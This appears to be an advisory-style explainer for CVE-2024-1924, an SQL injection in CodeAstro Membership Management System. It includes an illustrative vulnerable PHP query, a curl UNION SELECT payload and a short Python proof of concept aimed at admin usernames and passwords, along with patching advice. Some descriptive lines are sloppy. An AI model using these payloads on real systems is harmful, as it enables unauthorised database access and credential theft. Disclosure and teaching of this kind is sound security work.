CVE-2024-1924 - Critical SQL Injection in CodeAstro Membership Management System 1.

CVE ID: CVE-2024-1924
Vulnerable Software: CodeAstro Membership Management System 1.
Vulnerability Type: SQL Injection
Attack Vector: Remote
Public Exploit Available: YES
Reference: VDB-254859

What is CVE-2024-1924?

A critical SQL injection vulnerability has been found in the CodeAstro Membership Management System version 1.. The issue lies in how the /get_membership_amount.php file handles the membershipTypeId argument. If abused, this allows attackers from anywhere to manipulate the system’s database, view, edit, or even delete data, and potentially gain administrative access or execute further attacks.

How Does the Vulnerability Work?

The vulnerable PHP script does not properly validate or sanitize the input passed via the membershipTypeId HTTP parameter. Malicious users can supply specially crafted input that modifies the SQL query executed inside the script. This opens the door to all sorts of database manipulation.

Suppose this is a snippet from the vulnerable file

// get_membership_amount.php

<?php
include "db.php"; // connects to your database

$membershipTypeId = $_GET['membershipTypeId'];

$query = "SELECT amount FROM membership_types WHERE id = $membershipTypeId";
$result = mysqli_query($conn, $query);

$row = mysqli_fetch_assoc($result);
echo $row['amount'];
?>

Here, the user input from $_GET['membershipTypeId'] goes *directly* into the SQL query, making it possible to inject arbitrary SQL commands.

Below is a sample exploit using curl to extract data using a basic SQL injection

curl "http://targetsite.com/get_membership_amount.php?membershipTypeId=1%20UNION%20SELECT%20username%20FROM%20admin_users--";

This requests the normal amount for membership type 1.

- The UNION SELECT trick tells the database to append results from the admin_users table, possibly revealing sensitive user info.

Here’s a more advanced proof-of-concept in Python to dump database information

import requests

url = "http://targetsite.com/get_membership_amount.php";
payload = "1 UNION SELECT password FROM admin_users -- "

res = requests.get(url, params={'membershipTypeId': payload})
print("Response:", res.text)

Warning: Never test this without written permission on systems you own.

Patch and Update

Check the official CodeAstro repository or vendor advisories for updates and patches.

References

- Vulnerability Disclosure: VulDB VDB-254859
- OWASP: SQL Injection
- Github - Source Code

Summary

CVE-2024-1924 is a dangerous, publicly known vulnerability in CodeAstro's Membership Management System 1., affecting common installations and putting sensitive user data at risk. Site owners should patch immediately, double-check for SQL injection all user inputs, and follow security best practices to avoid further compromise.

If your system is at risk, take action — update, patch, and review your code today.


Stay Safe! If you use CodeAstro Membership Management System, audit your installation now. For help, see the resources above.

Timeline

Published on: 02/27/2024 17:15:11 UTC
Last modified on: 03/21/2024 02:51:49 UTC